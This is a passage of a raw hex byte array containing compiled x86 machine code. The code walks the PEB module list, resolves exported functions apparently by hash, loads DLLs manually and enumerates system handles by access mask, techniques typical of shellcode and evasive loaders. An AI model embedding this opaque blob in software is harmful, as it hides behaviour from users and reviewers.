0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0xEB,0x50,0x8B,0x45,0xF0,0x85,0xC0,0x74,0x44,0x8B,0x55,0xEC,0x8B,0x45,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x11,0x78,0x00,0x00,0x8B,0x5D,0xF0,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x83,0x7D,0x08,0x00,0x75,0x0D,0x83,0x7D,0x0C,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x61,0x83,0x7D,0x08,0x00,0x74,0x33,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x8B,0x12,0x00,0x00,0x89,0x45,0x0C,0x83,0x7D,0x0C,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x28,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0x7A,0x3D,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x00,0x10,0x00,0x00,0xE8,0xB6,0x11,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x23,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x2A,0xFD,0xFF,0xFF,0x89,0x45,0xF0,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x31,0x3B,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0xC9,0xC3,0x90,0x90,0x55,0x89,0xE5,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x30,0x00,0x00,0x00,0x8B,0x45,0xEC,0x64,0x8B,0x00,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x40,0x0C,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x83,0xC0,0x0C,0x89,0x45,0xF0,0x8B,0x45,0xF4,0x8B,0x40,0x0C,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x8B,0x40,0x18,0x89,0xC2,0x8B,0x45,0x08,0x39,0xD0,0x72,0x1F,0x8B,0x45,0xFC,0x8B,0x40,0x18,0x89,0xC2,0x8B,0x45,0xFC,0x8B,0x40,0x20,0x01,0xD0,0x8B,0x55,0x08,0x39,0xC2,0x73,0x08,0x8B,0x45,0xFC,0x8B,0x40,0x18,0xEB,0x15,0x8B,0x45,0xFC,0x8B,0x00,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x3B,0x45,0xF0,0x75,0xC2,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0x83,0x7D,0x08,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x60,0x8B,0x45,0x08,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x0F,0xB7,0x00,0x66,0x3D,0x4D,0x5A,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x47,0x8B,0x45,0xFC,0x8B,0x40,0x3C,0x89,0xC2,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x00,0x3D,0x50,0x45,0x00,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x24,0x8B,0x45,0xF8,0x0F,0xB7,0x40,0x16,0x66,0x89,0x45,0xF6,0x0F,0xB7,0x45,0xF6,0x25,0x00,0x20,0x00,0x00,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xE0,0x30,0x00,0x00,0x00,0x8B,0x45,0xE0,0x64,0x8B,0x00,0x89,0x45,0xDC,0x8B,0x45,0xDC,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x8B,0x40,0x0C,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x83,0xC0,0x0C,0x89,0x45,0xE8,0x8B,0x45,0xEC,0x8B,0x40,0x0C,0x89,0x45,0xF4,0xEB,0x42,0x8B,0x45,0xF4,0x8B,0x40,0x18,0x39,0x45,0x08,0x74,0x2B,0x8B,0x45,0xF4,0x8B,0x40,0x18,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8B,0x55,0x0C,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x7D,0x01,0x00,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x74,0x08,0x8B,0x45,0xE4,0xEB,0x19,0x90,0xEB,0x01,0x90,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x3B,0x45,0xE8,0x75,0xB6,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x53,0x81,0xEC,0x30,0x03,0x00,0x00,0xC7,0x44,0x24,0x04,0x2E,0x00,0x00,0x00,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0xB7,0x75,0x00,0x00,0x83,0xC0,0x01,0x89,0x45,0xF4,0x8B,0x55,0xF4,0x8B,0x45,0x0C,0x29,0xC2,0x89,0x55,0xF0,0x8D,0x85,0xE3,0xFE,0xFF,0xFF,0xB9,0x05,0x01,0x00,0x00,0xBB,0x00,0x00,0x00,0x00,0x89,0x18,0x89,0x5C,0x08,0xFC,0x8D,0x50,0x04,0x83,0xE2,0xFC,0x29,0xD0,0x01,0xC1,0x83,0xE1,0xFC,0xC1,0xE9,0x02,0x89,0xD7,0x89,0xD8,0xF3,0xAB,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8D,0x85,0xE3,0xFE,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x56,0x75,0x00,0x00,0x8D,0x85,0xE3,0xFE,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x38,0x75,0x00,0x00,0x89,0xC2,0x8D,0x85,0xE3,0xFE,0xFF,0xFF,0x01,0xD0,0xC7,0x00,0x64,0x6C,0x6C,0x00,0x8D,0x85,0xDA,0xFC,0xFF,0xFF,0xB9,0x08,0x02,0x00,0x00,0xBB,0x00,0x00,0x00,0x00,0x89,0x18,0x89,0x5C,0x08,0xFC,0x8D,0x50,0x04,0x83,0xE2,0xFC,0x29,0xD0,0x01,0xC1,0x83,0xE1,0xFC,0xC1,0xE9,0x02,0x89,0xD7,0x89,0xD8,0xF3,0xAB,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x8D,0x85,0xE3,0xFE,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8D,0x85,0xDA,0xFC,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x9C,0x74,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8D,0x85,0xDA,0xFC,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xD6,0x01,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x75,0x22,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x5C,0x33,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x5C,0xFE,0xFF,0xFF,0x89,0x45,0xE8,0x8B,0x45,0xE8,0xEB,0x28,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x3A,0x33,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x89,0x44,0x24,0x04,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x10,0x00,0x00,0x00,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x81,0xC4,0x30,0x03,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x58,0x8B,0x45,0x10,0x66,0x89,0x45,0xC4,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x95,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x51,0x01,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x8B,0x40,0x3C,0x89,0xC2,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xE8,0x8B,0x45,0xE8,0x83,0xC0,0x78,0x89,0x45,0xE4,0x8B,0x45,0xE4,0x8B,0x40,0x04,0x85,0xC0,0x74,0x09,0x8B,0x45,0xE4,0x8B,0x00,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x15,0x01,0x00,0x00,0x8B,0x45,0xE4,0x8B,0x10,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xE0,0x8B,0x45,0xE4,0x8B,0x40,0x04,0x89,0x45,0xDC,0x8B,0x45,0xE0,0x8B,0x50,0x1C,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xD8,0x8B,0x45,0xE0,0x8B,0x50,0x20,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xD4,0x8B,0x45,0xE0,0x8B,0x50,0x24,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xD0,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x83,0x7D,0x0C,0x00,0x74,0x6C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xEB,0x56,0x8B,0x45,0xF0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0x01,0xD0,0x8B,0x10,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x89,0x04,0x24,0xE8,0x37,0x32,0x00,0x00,0x39,0x45,0x0C,0x75,0x29,0x8B,0x45,0xF0,0x8D,0x14,0x00,0x8B,0x45,0xD0,0x01,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x8B,0x45,0xD8,0x01,0xD0,0x8B,0x10,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xF4,0xEB,0x2F,0x83,0x45,0xF0,0x01,0x8B,0x45,0xE0,0x8B,0x40,0x18,0x39,0x45,0xF0,0x72,0x9F,0xEB,0x1E,0x0F,0xB7,0x55,0xC4,0x8B,0x45,0xE0,0x8B,0x40,0x10,0x29,0xC2,0xC1,0xE2,0x02,0x8B,0x45,0xD8,0x01,0xD0,0x8B,0x10,0x8B,0x45,0x08,0x01,0xD0,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x31,0x8B,0x55,0xF4,0x8B,0x45,0xE0,0x39,0xC2,0x72,0x24,0x8B,0x55,0xE0,0x8B,0x45,0xDC,0x01,0xD0,0x8B,0x55,0xF4,0x39,0xC2,0x73,0x15,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x3B,0xFD,0xFF,0xFF,0x89,0x45,0xF4,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xD8,0x30,0x00,0x00,0x00,0x8B,0x45,0xD8,0x64,0x8B,0x00,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x8B,0x40,0x0C,0x89,0x45,0xEC,0x8B,0x45,0xEC,0x83,0xC0,0x0C,0x89,0x45,0xE8,0x8B,0x45,0xEC,0x8B,0x40,0x0C,0x89,0x45,0xF4,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xE6,0x72,0x00,0x00,0x85,0xC0,0x0F,0x95,0xC0,0x0F,0xB6,0xC0,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x74,0x26,0x8B,0x45,0xF4,0x8B,0x40,0x28,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x75,0x31,0x8B,0x45,0xF4,0x8B,0x40,0x18,0xE9,0x01,0x01,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x40,0x30,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xA1,0x9C,0x61,0x49,0x65,0xFF,0xD0,0x85,0xC0,0x75,0x0B,0x8B,0x45,0xF4,0x8B,0x40,0x18,0xE9,0xDB,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x3B,0x45,0xE8,0x75,0x9E,0x83,0x7D,0x0C,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBB,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0xB8,0xE4,0x48,0x65,0xE8,0x25,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xDA,0xEC,0x01,0xA3,0x89,0x04,0x24,0xE8,0x94,0xFD,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7F,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0xC7,0x44,0x24,0x04,0x04,0x01,0x00,0x00,0x89,0x04,0x24,0xE8,0xDE,0x6C,0x00,0x00,0x66,0x89,0x45,0xCC,0x0F,0xB7,0x45,0xCC,0x01,0xC0,0x66,0x89,0x45,0xCC,0x0F,0xB7,0x45,0xCC,0x83,0xC0,0x02,0x66,0x89,0x45,0xCE,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x0C,0x8D,0x45,0xCC,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0xC7,0x04,0x24,0x00,0x00,0x00,0x00,0x8B,0x45,0xE0,0xFF,0xD0,0x83,0xEC,0x10,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xC8,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x44,0x9C,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x05,0x01,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x8D,0x45,0xD8,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xCC,0xE4,0x48,0x65,0xE8,0xCA,0x10,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xE1,0x00,0x00,0x00,0x8D,0x45,0xDC,0x89,0x44,0x24,0x04,0x8D,0x45,0xE0,0x89,0x04,0x24,0xE8,0x97,0x0C,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xC5,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xE9,0x94,0x00,0x00,0x00,0x8B,0x45,0xE0,0x8B,0x55,0xF0,0xC1,0xE2,0x04,0x01,0xD0,0x83,0xC0,0x04,0x89,0x45,0xE4,0x8B,0x45,0xE4,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0x08,0x75,0x6A,0x8B,0x45,0xE4,0x8B,0x40,0x0C,0x23,0x45,0x0C,0x39,0x45,0x0C,0x75,0x5F,0x8B,0x45,0xE4,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0xD8,0x39,0xC2,0x75,0x51,0x8B,0x45,0xE8,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x10,0x27,0x00,0x00,0x76,0x1A,0xC7,0x04,0x24,0xD8,0xE4,0x48,0x65,0xE8,0x59,0xDE,0xFF,0xFF,0xC7,0x04,0x24,0x06,0xE5,0x48,0x65,0xE8,0x4D,0xDE,0xFF,0xFF,0xEB,0x53,0x8B,0x45,0xE4,0x0F,0xB7,0x40,0x06,0x0F,0xB7,0xD8,0x8B,0x45,0xE8,0x8B,0x00,0x8D,0x48,0x01,0x8B,0x55,0xE8,0x89,0x0A,0x89,0xD9,0x8B,0x55,0xE8,0x89,0x4C,0x82,0x04,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xF0,0x01,0x8B,0x45,0xE0,0x8B,0x00,0x39,0x45,0xF0,0x0F,0x82,0x5E,0xFF,0xFF,0xFF,0x8B,0x45,0x10,0x8B,0x55,0xE8,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x51,0x83,0x7D,0xE8,0x00,0x74,0x4B,0x83,0x7D,0xE8,0x00,0x74,0x45,0xC7,0x44,0x24,0x08,0x44,0x9C,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0xB7,0x6F,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xE8,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0xE0,0x85,0xC0,0x74,0x4B,0x8B,0x45,0xE0,0x85,0xC0,0x74,0x44,0x8B,0x55,0xDC,0x8B,0x45,0xE0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x65,0x6F,0x00,0x00,0x8B,0x5D,0xE0,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x44,0x9C,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x84,0x05,0x01,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x8D,0x45,0xD8,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x08,0xE5,0x48,0x65,0xE8,0xB9,0x0E,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xE1,0x00,0x00,0x00,0x8D,0x45,0xDC,0x89,0x44,0x24,0x04,0x8D,0x45,0xE0,0x89,0x04,0x24,0xE8,0x86,0x0A,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xC5,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xE9,0x94,0x00,0x00,0x00,0x8B,0x45,0xE0,0x8B,0x55,0xF0,0xC1,0xE2,0x04,0x01,0xD0,0x83,0xC0,0x04,0x89,0x45,0xE4,0x8B,0x45,0xE4,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0x08,0x75,0x6A,0x8B,0x45,0xE4,0x8B,0x40,0x0C,0x23,0x45,0x0C,0x39,0x45,0x0C,0x75,0x5F,0x8B,0x45,0xE4,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0xD8,0x39,0xC2,0x75,0x51,0x8B,0x45,0xE8,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x10,0x27,0x00,0x00,0x76,0x1A,0xC7,0x04,0x24,0xD8,0xE4,0x48,0x65,0xE8,0x48,0xDC,0xFF,0xFF,0xC7,0x04,0x24,0x06,0xE5,0x48,0x65,0xE8,0x3C,0xDC,0xFF,0xFF,0xEB,0x53,0x8B,0x45,0xE4,0x0F,0xB7,0x40,0x06,0x0F,0xB7,0xD8,0x8B,0x45,0xE8,0x8B,0x00,0x8D,0x48,0x01,0x8B,0x55,0xE8,0x89,0x0A,0x89,0xD9,0x8B,0x55,0xE8,0x89,0x4C,0x82,0x04,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xF0,0x01,0x8B,0x45,0xE0,0x8B,0x00,0x39,0x45,0xF0,0x0F,0x82,0x5E,0xFF,0xFF,0xFF,0x8B,0x45,0x10,0x8B,0x55,0xE8,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xE0,0x85,0xC0,0x74,0x4B,0x8B,0x45,0xE0,0x85,0xC0,0x74,0x44,0x8B,0x55,0xDC,0x8B,0x45,0xE0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0xAB,0x6D,0x00,0x00,0x8B,0x5D,0xE0,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x51,0x83,0x7D,0xE8,0x00,0x74,0x4B,0x83,0x7D,0xE8,0x00,0x74,0x45,0xC7,0x44,0x24,0x08,0x44,0x9C,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0x54,0x6D,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xE8,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0xC7,0x44,0x24,0x08,0x44,0x9C,0x00,0x00,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x0F,0x84,0xFE,0x00,0x00,0x00,0x8D,0x45,0xD8,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x18,0xE5,0x48,0x65,0xE8,0xA8,0x0C,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xE1,0x00,0x00,0x00,0x8D,0x45,0xDC,0x89,0x44,0x24,0x04,0x8D,0x45,0xE0,0x89,0x04,0x24,0xE8,0x75,0x08,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xC5,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xE9,0x94,0x00,0x00,0x00,0x8B,0x45,0xE0,0x8B,0x55,0xF0,0xC1,0xE2,0x04,0x01,0xD0,0x83,0xC0,0x04,0x89,0x45,0xE4,0x8B,0x45,0xE4,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0x08,0x75,0x6A,0x8B,0x45,0xE4,0x8B,0x40,0x0C,0x23,0x45,0x0C,0x39,0x45,0x0C,0x75,0x5F,0x8B,0x45,0xE4,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0xD8,0x39,0xC2,0x75,0x51,0x8B,0x45,0xE8,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x10,0x27,0x00,0x00,0x76,0x1A,0xC7,0x04,0x24,0xD8,0xE4,0x48,0x65,0xE8,0x37,0xDA,0xFF,0xFF,0xC7,0x04,0x24,0x06,0xE5,0x48,0x65,0xE8,0x2B,0xDA,0xFF,0xFF,0xEB,0x53,0x8B,0x45,0xE4,0x0F,0xB7,0x40,0x06,0x0F,0xB7,0xD8,0x8B,0x45,0xE8,0x8B,0x00,0x8D,0x48,0x01,0x8B,0x55,0xE8,0x89,0x0A,0x89,0xD9,0x8B,0x55,0xE8,0x89,0x4C,0x82,0x04,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xF0,0x01,0x8B,0x45,0xE0,0x8B,0x00,0x39,0x45,0xF0,0x0F,0x82,0x5E,0xFF,0xFF,0xFF,0x8B,0x45,0x10,0x8B,0x55,0xE8,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xE0,0x85,0xC0,0x74,0x4B,0x8B,0x45,0xE0,0x85,0xC0,0x74,0x44,0x8B,0x55,0xDC,0x8B,0x45,0xE0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x9A,0x6B,0x00,0x00,0x8B,0x5D,0xE0,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x51,0x83,0x7D,0xE8,0x00,0x74,0x4B,0x83,0x7D,0xE8,0x00,0x74,0x45,0xC7,0x44,0x24,0x08,0x44,0x9C,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0x43,0x6B,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xE8,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x83,0xEC,0x64,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x